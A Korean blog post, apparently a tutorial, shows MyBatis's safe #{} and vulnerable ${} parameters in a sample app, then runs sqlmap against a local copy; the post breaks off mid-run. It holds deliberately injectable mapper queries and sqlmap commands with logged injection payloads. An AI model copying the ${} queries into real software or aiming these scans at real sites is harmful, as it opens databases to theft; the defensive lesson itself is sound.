{"id":2175,"date":"2013-04-03T21:50:06","date_gmt":"2013-04-03T12:50:06","guid":{"rendered":"http:\/\/apollo89.com\/wordpress\/?p=2175"},"modified":"2013-09-13T08:32:18","modified_gmt":"2013-09-12T23:32:18","slug":"mybatis-%ec%b7%a8%ec%95%bd%ec%a0%90","status":"publish","type":"post","link":"https:\/\/apollo89.com\/wordpress\/?p=2175","title":{"rendered":"mybatis sql injection \ucde8\uc57d\uc810"},"content":{"rendered":"

 <\/p>\n

Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4.
\n\uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4.
\n<\/strong><\/p>\n

\ucc38\uace0 :\u00a0ibatis (ibatis.apache.org) \ub294 google code \ucabd\uc73c\ub85c \uc774\uc804\ud588\uc73c\uba70, \uc774\ub984\uc744\u00a0mybatis.org\uc73c\ub85c \ubc14\uafe8\ub2e4<\/p>\n

1. myBatis \uac1c\uc694
\n\"mybatis_flow\"<\/p>\n

MyBatis \ub294 Data Mapper \ud504\ub808\uc784\uc6cc\ud06c\ub85c\uc11c, SQL\uc744 XML\uc73c\ub85c \uad00\ub9ac\ud558\uba70, \uc608\uc678\ucc98\ub9ac \ubc0f \ud2b8\ub80c\uc81d\uc158 \ucc98\ub9ac\ub97c \ud3b8\ub9ac\ud558\uac8c \ud560\uc218 \uc788\ub3c4\ub85d \uc9c0\uc6d0\ud558\ub294\u00a0Persistence Layer \ud504\ub808\uc784\uc6cc\ud06c\uc774\ub2e4.<\/p>\n

MyBatis \ub294 \ub370\uc774\ud130\ubca0\uc774\uc2a4 \ub808\ucf54\ub4dc\uc5d0 \uc6d0\uc2dc\ud0c0\uc785\uacfc Map \uc778\ud130\ud398\uc774\uc2a4, \uc790\ubc14 POJO\ub97c XML\uacfc \uc5b4\ub178\ud14c\uc774\uc158\uc73c\ub85c \uc124\uc815\ud558\uace0 \ub9e4\ud551\ud560 \uc218 \uc788\ub294 \ub2e8\uc21c\ud558\uba74\uc11c\ub3c4 \uac15\ub825\ud55c \ud504\ub808\uc784\uc6cc\ud06c\uc774\ub2e4.<\/p>\n

2. myBatis \ub3d9\uc791\ubc29\uc2dd<\/p>\n

\uc544\ub798\uc758 \uc608\uc81c\ub294 mybatis\uc758 \ub3d9\uc791\ubc29\uc2dd\uc744 \uc124\uba85\ud558\uae30 \uc704\ud574 \uc791\uc131\ub41c \uc18c\uc2a4\uc774\ubbc0\ub85c\u00a0\ud504\ub808\uc784\uc6cc\ud06c(Spring)\uc640 \uc5f0\ub3d9\ud558\uc9c0 \uc54a\uace0 \uad6c\ud604\ud558\uc600\ub2e4.
\nDB\ub294 mysql\uc744 \uc0ac\uc6a9\ud558\uc600\uc73c\uba70, \uc2a4\ud0a4\ub9c8\ub294 mybatis\uc5d0\uc11c \uc0d8\ud50c\ub85c \uc81c\uacf5\ud558\ub294 jpetstore\uc758 DB\uc2a4\ud0a4\ub9c8 \uc911 item\ud14c\uc774\ube14\uc744 \uc0ac\uc6a9\ud558\uc600\ub2e4. (\ucc38\uace0 : http:\/\/mybatis.github.com\/spring\/sample.html)
\n\uc608\uc81c \ucf54\ub4dc \uc704\uce58 :\u00a0https:\/\/github.com\/apollo8900\/mybatis_sample\/<\/p>\n

\uba3c\uc800 \uc18c\uc2a4\ud2b8\ub9ac\ub97c \ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.
\n\"src_tree\"<\/p>\n

\uba3c\uc800 SqlSessionFactoryManager.java\ub97c \uc0b4\ud3b4\ubcf4\uba74,<\/p>\n

package com.apollo89.mybatis_sample;\r\n\r\nimport java.io.IOException;\r\nimport java.io.Reader;\r\nimport org.apache.ibatis.io.Resources;\r\nimport org.apache.ibatis.session.SqlSessionFactory;\r\nimport org.apache.ibatis.session.SqlSessionFactoryBuilder;\r\nimport org.apache.log4j.Logger;\r\n\r\npublic class SqlSessionFactoryManager {\r\n\tprivate static Logger log = Logger.getLogger(SqlSessionFactoryManager.class);\r\n\tprivate static final SqlSessionFactory sqlMapper;\r\n\tstatic{\r\n\t\tString resource = \"SqlMapConfig.xml\";\r\n\t\tReader reader = null;\r\n\t\ttry {\r\n\t\t\treader = Resources.getResourceAsReader(resource);\r\n\t\t} catch (IOException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tsqlMapper = new SqlSessionFactoryBuilder().build(reader);\r\n\t}\r\n\tpublic static SqlSessionFactory getSqlSessionFactory() {\r\n\t\treturn sqlMapper;   \r\n\t}\r\n}<\/pre>\n
SqlSessionFactoryManager \ud074\ub798\uc2a4\uc5d0\uc11c SqlMapConfig.xml \ud30c\uc77c\uc744 \ub85c\ub529(17\ubc88)\ud558\uc5ec SqlSessionFactory \uc778\uc2a4\ud130\uc2a4\ub97c \uc2f1\uae00\ud1a4\uc73c\ub85c \uc0dd\uc131\ud558\ub3c4\ub85d \uad6c\ud604\ud55c\ub2e4.
\n\uc774\ub807\uac8c \uc0dd\uc131\ub41c SqlSessionFactory \uc778\uc2a4\ud134\uc2a4\ub294 \ub098\uc911\uc5d0 ItemDao \uc5d0\uc11c \uc0ac\uc6a9\ub420 \uac83\uc774\ub2e4.<\/p>\n
\uadf8\ub7ec\uba74 SqlMapConfig.xml \ub97c \ubcf4\uc790.<\/p>\n
<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n<!DOCTYPE configuration\r\nPUBLIC \"-\/\/mybatis.org\/\/DTD Config 3.0\/\/EN\"\r\n\"http:\/\/mybatis.org\/dtd\/mybatis-3-config.dtd\">\r\n<configuration>\r\n\t<properties resource=\"db.properties\">\r\n\t<\/properties>\r\n\t<environments default=\"development\" >\r\n\t\t<environment id=\"development\" >\r\n\t\t\t<transactionManager type=\"JDBC\" \/>\r\n\t\t\t<dataSource type=\"POOLED\" >\r\n\t\t\t\t<property name=\"driver\" value=\"${driver}\" \/>\r\n\t\t\t\t<property name=\"url\" value=\"${url}\" \/>\r\n\t\t\t\t<property name=\"username\" value=\"${user}\" \/>\r\n\t\t\t\t<property name=\"password\" value=\"${pwd}\" \/>\r\n\t\t\t<\/dataSource>\r\n\t\t<\/environment>\r\n\t<\/environments>\r\n\t<mappers>\r\n\t\t<mapper resource=\"sqlmap\/item.xml\" \/>\r\n\t<\/mappers>\r\n<\/configuration><\/pre>\n
SqlMapConfig.xml\uc5d0\uc11c\ub294 db.properties\ud30c\uc77c\uc744 \uc77d\uc5b4\uc11c(6\ubc88) Data Source \uc73c\ub85c JDBC Connection Pool\uc744 \uc0dd\uc131(11\ubc88)\ud55c\ub2e4.
\n\uadf8\ub9ac\uace0 mybatis\uc5d0\uc11c \uc0ac\uc6a9\ud560 sql mapper \ud30c\uc77c\ub97c \uc124\uc815(20\ubc88)\ud55c\ub2e4.<\/p>\n
db.properties \ud30c\uc77c\uc5d0\ub294 DB\uc811\uc18d\uc744 \uc704\ud55c \uc815\ubcf4\ub97c \uc791\uc131\ud55c\ub2e4.<\/p>\n
driver = com.mysql.jdbc.Driver\r\nurl    = jdbc:mysql:\/\/mysql_host:3306\/mybatis_sample?useUnicode=true&characterEncoding=utf-8\r\nuser   = mysql_id\r\npwd    = mysql_pw<\/pre>\n
\uc774\ubc88\uc5d0\ub294 sql mapper\uc774 \uc124\uc815\ub41c item.xml \ud30c\uc77c\uc744 \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n
<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n<!DOCTYPE mapper\r\nPUBLIC \"-\/\/mybatis.org\/\/DTD Mapper 3.0\/\/EN\"\r\n\"http:\/\/mybatis.org\/dtd\/mybatis-3-mapper.dtd\">\r\n<mapper namespace=\"mybatis_sample\">\r\n\t<resultMap id=\"hashmap\" type=\"java.util.HashMap\"><\/resultMap>\r\n\r\n\t<select id=\"getItemAll\" resultMap=\"hashmap\">\r\n\t\tSELECT * FROM item \r\n\t<\/select>\r\n\r\n\t<select id=\"getItem\" parameterType=\"hashmap\" resultMap=\"hashmap\">\r\n\t\tSELECT * FROM item \r\n\t\t WHERE 1 = 1\r\n\t\t   AND itemid = #{itemid}\r\n\t<\/select>\r\n\r\n\t<select id=\"getItem2\" parameterType=\"hashmap\" resultMap=\"hashmap\">\r\n\t\tSELECT * FROM item \r\n\t\t WHERE 1 = 1\r\n\t\t   AND itemid = '${itemid}'\r\n\t<\/select>\r\n\r\n\t<select id=\"getItems\" parameterType=\"hashmap\" resultMap=\"hashmap\">\r\n\t\t SELECT * FROM item\r\n\t\t WHERE 1 = 1\r\n\t\t   AND itemid like concat('%',#{keyword},'%')\r\n\t<\/select>\t\r\n\r\n    <select id=\"getItems2\" parameterType=\"hashmap\" resultMap=\"hashmap\">\r\n         SELECT * FROM item\r\n         WHERE 1 = 1\r\n           AND itemid like '%${keyword}%'\r\n    <\/select>   \r\n\r\n<\/mapper><\/pre>\n
mapper\uc758 namespace\ub97c mybatis_sample\uc73c\ub85c \uc124\uc815\ud558\uace0 \uac01\uac01\uc758 sql \uc744 \uc791\uc131\ud55c\ub2e4.<\/p>\n
\uc5ec\uae30\uc11c\ub294 mybatis\uc758 # \ud30c\ub77c\ubbf8\ud130\uc640 $ \ud30c\ub77c\ubbf8\ud130\uc758 \ucde8\uc57d\uc810 \ud14c\uc2a4\ud2b8\ub97c \uc704\ud574\uc11c \uac01\uac01 2\uac00\uc9c0 sql \uad6c\ubb38\uc744 \uc791\uc131\ud558\uc600\ub2e4.<\/p>\n
getItems\uc740 \ucde8\uc57d\uc810\uc774 \uc5c6\ub294 # \ubc29\uc2dd\uc73c\ub85c \ud30c\ub77c\ubbf8\ud130\ub97c \ubc1b\uc558\uace0, getItems2\ub294 \ucde8\uc57d\uc810\uc774 \uc874\uc7ac\ud558\ub294 $ \ubc29\uc2dd\uc73c\ub85c \ud30c\ub77c\ubbf8\ud130\ub97c \ubc1b\uc558\ub2e4.<\/p>\n
\ub450\uac00\uc9c0 \ubc29\uc2dd \ubaa8\ub450 \ud504\ub85c\uadf8\ub7a8\uc774 \uc815\uc0c1\uc801\uc73c\ub85c \ub3d9\uc791\ud55c\ub2e4.<\/p>\n
\uc774\ubc88\uc5d0\ub294 \uc2e4\uc81c DB\uc5d0 \uc811\uc18d\ud574\uc11c sql\uc744 \ucc98\ub9ac\ud558\ub294 ItemDao.java\ub97c \ubcf4\uc790.<\/p>\n
package com.apollo89.mybatis_sample;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.HashMap;\r\n\r\nimport org.apache.ibatis.session.SqlSessionFactory;\r\n\r\nimport com.apollo89.mybatis_sample.SqlSessionFactoryManager;\r\n\r\npublic class ItemDao {\r\n\r\n\tSqlSessionFactory sqlMapper = SqlSessionFactoryManager.getSqlSessionFactory();\r\n\r\n\tpublic ItemDao() {\r\n\t}\r\n\r\n\t@SuppressWarnings({ \"rawtypes\", \"unchecked\" })\r\n\tpublic ArrayList<HashMap<String, String>> getItemAll(){ \r\n\t\treturn (ArrayList)sqlMapper.openSession().selectList(\"mybatis_sample.getItemAll\");\r\n\t}\r\n\r\n\t@SuppressWarnings({ \"rawtypes\", \"unchecked\" })\r\n\tpublic ArrayList<HashMap<String, String>> getItems(HashMap<String, String> map){ \r\n\t\treturn (ArrayList)sqlMapper.openSession().selectList(\"mybatis_sample.getItems\",map);\r\n\t}\r\n\r\n\t@SuppressWarnings({ \"rawtypes\", \"unchecked\" })\r\n\tpublic ArrayList<HashMap<String, String>> getItems2(HashMap<String, String> map){ \r\n\t\treturn (ArrayList)sqlMapper.openSession().selectList(\"mybatis_sample.getItems2\",map);\r\n\t}\r\n\r\n\t@SuppressWarnings({ \"rawtypes\", \"unchecked\" })\r\n\tpublic ArrayList<HashMap<String, String>> getItem(HashMap<String, String> map){ \r\n\t\treturn (ArrayList)sqlMapper.openSession().selectList(\"mybatis_sample.getItem\",map);\r\n\t}\r\n\r\n\t@SuppressWarnings({ \"rawtypes\", \"unchecked\" })\r\n\tpublic ArrayList<HashMap<String, String>> getItem2(HashMap<String, String> map){ \r\n\t\treturn (ArrayList)sqlMapper.openSession().selectList(\"mybatis_sample.getItem2\",map);\r\n\t}\r\n\r\n}<\/pre>\n
ItemDao\ub294 SqlSessionFactoryManager\uc758 getSqlSessionFactory\uc744 \ud1b5\ud574 \uc778\uc2a4\ud134\uc2a4\ub97c sqlMapper\uc5d0 \uc800\uc7a5(12\ubc88)\ud55c\ub2e4.<\/p>\n
\uadf8\ub9ac\uace0 sqlMapper\uc744 \uc0ac\uc6a9\ud574\uc11c \uc138\uc158\uc744 \uc5f4\uace0 sql mapper\uc5d0\uc11c \uc124\uc815\ud55c sql\uc5d0 map \uc815\ubcf4\ub97c \ud30c\ub77c\ubbf8\ud130\ub85c \uc9c8\uc758(19,24,29,34,39\ubc88)\ud55c\ub2e4.<\/p>\n
\uc790, \uadf8\ub7ec\uba74, \ub9c8\uc9c0\ub9c9\uc73c\ub85c \ud654\uba74\uc778 index.jsp\ub97c \uc0b4\ud3b4\ubcf4\uc790<\/p>\n
<%@ page import=\"java.util.HashMap\"%>\r\n<%@ page import=\"java.util.ArrayList\"%>\r\n<%@ page import=\"com.apollo89.mybatis_sample.ItemDao\"%>\r\n<%@ page language=\"java\" contentType=\"text\/html; charset=UTF-8\" pageEncoding=\"UTF-8\"%>\r\n<%@ taglib prefix=\"c\" uri=\"http:\/\/java.sun.com\/jsp\/jstl\/core\" %>\r\n<%\r\nItemDao dao = new ItemDao();\r\nArrayList<HashMap<String, String>> list = null;  \r\n\r\nString keyword = request.getParameter(\"keyword\");\r\n\r\nif(keyword == null || \"\".equals(keyword)){\r\n\tlist = dao.getItemAll();\r\n} else {\r\n\tHashMap<String,String> map = new HashMap<String,String>();\r\n\tmap.put(\"keyword\",keyword);\r\n\tlist = dao.getItems(map); \r\n}\r\n%>\r\n<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\">\r\n<title>mybatis_sample<\/title>\r\n<script src=\"\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/1.9.1\/jquery.min.js\"><\/script>\r\n<script type=\"text\/javascript\">\r\nfunction search() {\r\n\t$(location).attr('href','index.jsp?keyword='+$(\"#keyword\").val());\r\n}\r\n<\/script>\r\n<\/head>\r\n<body>\r\n<div>\r\n<input type=\"text\" id=\"keyword\" name=\"keyword\" value=\"\">\r\n<input type=\"button\" id=\"search\" name=\"search\" value=\"search\" onclick=\"search()\" >\r\n<\/div>\r\n<div>\r\n   <table border=\"1\">\r\n      <colgroup>\r\n        <col width=\"20%\">\r\n        <col width=\"40%\">\r\n        <col width=\"20%\">\r\n        <col width=\"20%\">\r\n      <\/colgroup>\r\n\r\n      <thead>\r\n        <tr> \r\n           <th>itemid<\/th><th>productid<\/th><th>listprice<\/th><th>attr1<\/th>\r\n        <\/tr>\r\n      <\/thead>\r\n\r\n      <tbody>\r\n         <!-- jstl\uc744 \uc774\uc6a9\ud558\uc5ec list\uc5d0 \ub2f4\uaca8\uc788\ub294 Map\uc758 value\uac12\uc744 \ud638\ucd9c  -->\r\n         <c:forEach var=\"list\" items=\"<%=list%>\">\r\n            <tr>\r\n              <td><a href=\"item.jsp?itemid=${list.itemid}\">${list.itemid}<\/td>\r\n              <td>${list.productid}<\/td>\r\n              <td>${list.listprice}<\/td>\r\n              <td>${list.attr1}<\/td>\r\n            <\/tr>\r\n\r\n\t\t <\/c:forEach>\r\n      <\/tbody>\r\n   <\/table>\r\n <\/div>\r\n\r\n<\/body>\r\n<\/html><\/pre>\n
\uba3c\uc800 itemDao\uc758 \uc778\uc2a4\ud134\uc2a4\ub97c \uc0dd\uc131(7\ubc88)\ud55c\ub2e4<\/p>\n
keyword\ub77c\ub294 \ud30c\ub77c\ub9c8\ud130\ub97c \uc785\ub825(10\ubc88)\ubc1b\ub294\ub2e4.
\n\ubcf4\uc548\uc744 \uc704\ud574\uc11c\ub294 keyword \uc785\ub825\uac12\uc744 \uac80\uc99d\ud574\uc57c \ud558\uc9c0\ub9cc, \uc5ec\uae30\uc11c\ub294 mybatis \ucde8\uc57d\uc810 \ud14c\uc2a4\ud2b8\ub97c \uc704\ud574\uc11c \uc785\ub825\uac12 \uac80\uc99d\uc744 \ud558\uc9c0 \uc54a\ub294\ub2e4.
\nkeyword\uac00 \uc788\uc73c\uba74, keyword \uc815\ubcf4\ub97c HashMap\uc5d0 \ub2f4\uc544 getItems\ub97c \ud638\ucd9c\ud558\uace0, \uacb0\uacfc\ub97c list\uc5d0 \ub2f4\ub294\ub2e4.
\nkeyword\uac00 \uc5c6\uc73c\uba74, getItemAll\ub97c \ud638\ucd9c\ud558\uace0, \uacb0\uacfc\ub97c list\uc5d0 \ub2f4\ub294\ub2e4.<\/p>\n
\ubc1b\uc740 list \uc815\ubcf4\ub97c JSTL(JSP Standard Tag Library)\ub97c \uc0ac\uc6a9\ud574\uc11c \ubcf4\uc5ec\uc900\ub2e4.(54\ubc88)
\n\"view\"<\/p>\n
3. myBatis \ucde8\uc57d\uc810 \ud655\uc778.<\/p>\n
\uadf8\ub7ec\uba74 \uc704\uc5d0\uc11c \uc791\uc131\ud55c \uc608\uc81c\ucf54\ub4dc \ud65c\uc6a9\ud558\uc5ec\u00a0\ucde8\uc57d\uc810 \uacf5\uaca9\ub97c \uc2dc\ub3c4\ud574 \ubcf4\uaca0\ub2e4.(sqlmap \uc0ac\uc6a9)<\/p>\n
\uba3c\uc800 # \ud30c\ub77c\ubbf8\ud130\ub97c \uc0ac\uc6a9\ud55c \ucde8\uc57d\ud558\uc9c0 \uc54a\uc740 \ud398\uc774\uc9c0\ub97c \uacf5\uaca9 (item.xml\uc758 getItems\uc758 \uacbd\uc6b0)<\/p>\n
C:\\Python27\\sqlmap>sqlmap.py -u \"http:\/\/localhost:8080\/mybatis_\r\nsample\/index.jsp?keyword=1\" --dbs\r\n\r\n    sqlmap\/1.0-dev - automatic SQL injection and database takeover tool\r\n    http:\/\/sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual\r\n consent is illegal. It is the end user's responsibility to obey all applicable\r\nlocal, state and federal laws. Developers assume no liability and are not respon\r\nsible for any misuse or damage caused by this program\r\n\r\n[*] starting at 09:15:09\r\n\r\n[09:15:09] [INFO] testing connection to the target url\r\n[09:15:10] [INFO] testing if the url is stable. This can take a couple of second\r\ns\r\n[09:15:11] [INFO] url is stable\r\n[09:15:11] [INFO] testing if GET parameter 'keyword' is dynamic\r\n[09:15:11] [INFO] confirming that GET parameter 'keyword' is dynamic\r\n[09:15:11] [INFO] GET parameter 'keyword' is dynamic\r\n[09:15:11] [WARNING] reflective value(s) found and filtering out\r\n[09:15:11] [WARNING] heuristic (basic) test shows that GET parameter 'keyword' m\r\night not be injectable\r\n[09:15:11] [INFO] testing for SQL injection on GET parameter 'keyword'\r\n[09:15:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\r\n[09:15:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n'\r\n[09:15:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'\r\n[09:15:51] [INFO] testing 'Microsoft SQL Server\/Sybase AND error-based - WHERE o\r\nr HAVING clause'\r\n[09:16:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT\r\nype)'\r\n[09:16:11] [INFO] testing 'MySQL inline queries'\r\n[09:16:11] [INFO] testing 'PostgreSQL inline queries'\r\n[09:16:11] [INFO] testing 'Microsoft SQL Server\/Sybase inline queries'\r\n[09:16:11] [INFO] testing 'Oracle inline queries'\r\n[09:16:31] [INFO] testing 'SQLite inline queries'\r\n[09:16:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'\r\n[09:16:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'\r\n[09:16:52] [INFO] testing 'Microsoft SQL Server\/Sybase stacked queries'\r\n[09:16:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'\r\n[09:17:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'\r\n[09:17:12] [INFO] testing 'Microsoft SQL Server\/Sybase time-based blind'\r\n[09:17:32] [INFO] testing 'Oracle AND time-based blind'\r\n[09:17:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'\r\n[09:19:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'\r\n[09:19:33] [WARNING] using unescaped version of the test because of zero knowled\r\nge of the back-end DBMS. You can try to explicitly set it using option '--dbms'\r\n[09:21:13] [WARNING] GET parameter 'keyword' is not injectable\r\n[09:21:13] [CRITICAL] all tested parameters appear to be not injectable. Try to\r\nincrease '--level'\/'--risk' values to perform more tests. Also, you can try to r\r\nerun by providing either a valid value for option '--string' (or '--regexp')\r\n\r\n[*] shutting down at 09:21:13\r\n\r\nC:\\Python27\\sqlmap><\/pre>\n
\ubcf4\ub294\uac83\uacfc \uac19\uc774 \ucde8\uc57d\ud558\uc9c0 \uc54a\ub2e4.<\/p>\n
\uc704\uc640 \uac19\uc774 \uacf5\uaca9\uc774 \ub4e4\uc5b4\uc62c \uacbd\uc6b0 mybatis\uc5d0\uc11c \ub3d9\uc791\ud558\ub294 \ubc29\uc2dd\uc744 \ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4..<\/p>\n
 ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 5861(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 4110(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1.(])(([)',(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 6528-6527(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1sVuN(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1) AND 6221=3100 AND (6030=6030(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1) AND 4307=4307 AND (3172=3172(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1 AND 4805=8494(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1 AND 4307=4307(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1') AND 1364=2700 AND ('jGgp'='jGgp(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1') AND 4307=4307 AND ('rIHa'='rIHa(String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1' AND 5137=9428 AND 'XIPx'='XIPx(String)\r\n\r\n...(\uc0dd\ub7b5)...\r\n\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (String)\r\n ==>  Preparing: SELECT * FROM item WHERE 1 = 1 AND itemid like concat('%',?,'%') \r\n ==> Parameters: 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- (String)<\/pre>\n
\uc704\uc5d0\uc11c \ubcf4\ub294\uac83\uacfc \uac19\uc774 # \ud30c\ub77c\ubbf8\ud130\ub97c prepareStatement\uc73c\ub85c \ubcc0\ud658\ud558\uc5ec \ud30c\ub77c\ubbf8\ud130\ub97c \ub9e4\ud551\ud574\uc8fc\ub294 \uad6c\uc870\uc774\ub2e4.<\/p>\n
\uadf8\ub7ec\uba74, $ \ud30c\ub77c\ubbf8\ud130\ub97c \uc0ac\uc6a9\ud55c \ucde8\uc57d\ud55c \ud398\uc774\uc9c0\ub97c \uacf5\uaca9\ud574\ubcf4\uc790 (item.xml\uc758 getItems2\uc758 \uacbd\uc6b0)<\/p>\n
C:\\Python27\\sqlmap>sqlmap.py -u \"http:\/\/localhost:8080\/mybatis_\r\nsample\/index.jsp?keyword=1\" --dbs\r\n\r\n    sqlmap\/1.0-dev - automatic SQL injection and database takeover tool\r\n    http:\/\/sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual\r\n consent is illegal. It is the end user's responsibility to obey all applicable\r\nlocal, state and federal laws. Developers assume no liability and are not respon\r\nsible for any misuse or damage caused by this program\r\n\r\n[*] starting at 09:22:58\r\n\r\n[09:22:58] [INFO] testing connection to the target url\r\n[09:22:58] [INFO] testing if the url is stable. This can take a couple of second\r\ns\r\n[09:22:59] [INFO] url is stable\r\n[09:22:59] [INFO] testing if GET parameter 'keyword' is dynamic\r\n[09:22:59] [INFO] confirming that GET parameter 'keyword' is dynamic\r\n[09:22:59] [INFO] GET parameter 'keyword' is dynamic\r\n[09:22:59] [WARNING] reflective value(s) found and filtering out\r\n[09:22:59] [INFO] heuristic (basic) test shows that GET parameter 'keyword' migh\r\nt be injectable (possible DBMS: 'MySQL')\r\n[09:22:59] [INFO] testing for SQL injection on GET parameter 'keyword'\r\nheuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you\r\nwant to skip test payloads specific for other DBMSes? [Y\/n] Y\r\ndo you want to include all tests for 'MySQL' extending provided level (1) and ri\r\nsk (1)? [Y\/n] Y\r\n[09:23:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\r\n[09:23:28] [INFO] GET parameter 'keyword' is 'AND boolean-based blind - WHERE or\r\n HAVING clause' injectable\r\n[09:23:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n'\r\n[09:23:28] [INFO] GET parameter 'keyword' is 'MySQL >= 5.0 AND error-based - WHE\r\nRE or HAVING clause' injectable\r\n[09:23:28] [INFO] testing 'MySQL inline queries'\r\n[09:23:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'\r\n[09:23:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'\r\n[09:23:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'\r\n[09:23:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'\r\n[09:24:28] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'\r\n[09:24:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - co\r\nmment)'\r\n[09:24:31] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'\r\n[09:25:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'\r\n[09:25:03] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'\r\n[09:25:03] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (hea\r\nvy queries)'\r\n[09:25:03] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)\r\n'\r\n[09:25:03] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)\r\n'\r\n[09:25:03] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'\r\n[09:25:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'\r\n[09:25:03] [INFO] automatically extending ranges for UNION query injection techn\r\nique tests as there is at least one other potential injection technique found\r\n[09:25:03] [INFO] ORDER BY technique seems to be usable. This should reduce the\r\ntime needed to find the right number of query columns. Automatically extending t\r\nhe range for current UNION query injection technique test\r\n[09:25:33] [CRITICAL] connection timed out to the target url or proxy. sqlmap is\r\n going to retry the request\r\n[09:25:33] [WARNING] most probably web server instance hasn't recovered yet from\r\n previous timed based payload. If the problem persists please wait for few minut\r\nes and rerun without flag T in option '--technique' (e.g. '--flush-session --tec\r\nhnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec\r\n=2')\r\n[09:26:04] [CRITICAL] connection timed out to the target url or proxy. sqlmap is\r\n going to retry the request\r\n[09:26:35] [CRITICAL] connection timed out to the target url or proxy. sqlmap is\r\n going to retry the request\r\n[09:26:51] [INFO] target url appears to have 11 columns in query\r\n[09:26:54] [INFO] GET parameter 'keyword' is 'MySQL UNION query (NULL) - 1 to 20\r\n columns' injectable\r\nGET parameter 'keyword' is vulnerable. Do you want to keep testing the others 